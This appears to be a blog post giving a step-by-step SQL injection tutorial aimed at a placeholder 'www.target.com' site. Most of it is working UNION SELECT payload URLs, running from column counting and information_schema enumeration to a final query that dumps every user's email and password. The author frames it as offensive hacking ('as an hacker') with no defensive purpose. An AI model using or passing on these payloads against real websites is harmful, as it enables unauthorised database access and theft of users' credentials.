this can be perform on mozilla firefox web browser........
SQL websites looks like this "www.target.com/material.php?id=5"
it may be "/image.php?id="
"/product.php?id="
so on..............
first you need to check the vulrneablity of the website. for this just add ' after the url.. suppose the website is
www.target.com/material.php?id=5
add ' after this url..like
www.target.com/material.php.id=5' then press enter.. if it shows the error page then the website is vulrneable...
now lets start the real job....
now you have to find the numbers of columns for add the following in the url..
www.target.com/material.php?id=-5 order by 1--
www.target.com/material.php?id=-5 order by 2--
www.target.com/material.php?id=-5 order by 3--
www.target.com/material.php?id=-5 order by 4--
www.target.com/material.php?id=-5 order by 5--
check untill an error page appears..... now union select all the columns.. suppose i get an error page on 7.. so i will add this in url
www.target.com/material.php?id=-5 union select all 1,2,3,4,5,6,7--
afetr this the web page will show the columns number which will be used in further.. suppose I got 3 and 4.. then i will choose the column which is in bold font... suppose it is 3..
now you have to check the version.... note if its version is smaller the 5 you have to guss the table name which is very deficult and if its version is greater or equal to 5 you don't need to guss the table name..
to check the version just add the following
www.target.com/material.php?id=-5 union select all 1,2,@@version,4,5,6,7--
now find the database name.. for ths add following
www.target.com/material.php?id=-5 union select all 1,2,database,4,5,6,7--
now find the table names.. for this
www.target.com/material.php?id=-5 union select all 1,2,table_name,4,5,6,7 from information_schema.tables--
if you the the "character_sets" only as table name do the following
www.target.com/material.php?id=-5 union select all 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables--
now you get a list of table name... like users, admin, user_info, etc.. choose the table name.... suppose i choose "users" in my case.. now find the columns name...for this
www.target.com/material.php?id=-5 union select all 1,2,column_name,4,5,6,7 from information_schema.columns where table_name=users--
if error page appears the you have to change the table name in MSQL char....for this you have to download hackbar.... remember hackbar is a add on in firefox... you can not perform this in any other browser...
for downloading the hackbar on firefox... goto the following link.....
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
and if again an error page appears then just add "group_concat" in the url.. like this
www.target.com/material.php?id=-5 union select all 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=mysql char--
now it will show you the columns name of "users" table.... like "email", "password", "id", "address", "phone no.", etc
now chose the columns.... as an hacker i know all of you will choose "email" and "password"... so lets do
www.target.com/material.php?id=-5 union select all 1,2,group_concat(email,0x3a,password),4,5,6,7 from users--
done it will show all the email and their password.......
hope you all like!!!!!!!!!!!!!!!!!!
No comments:
Post a Comment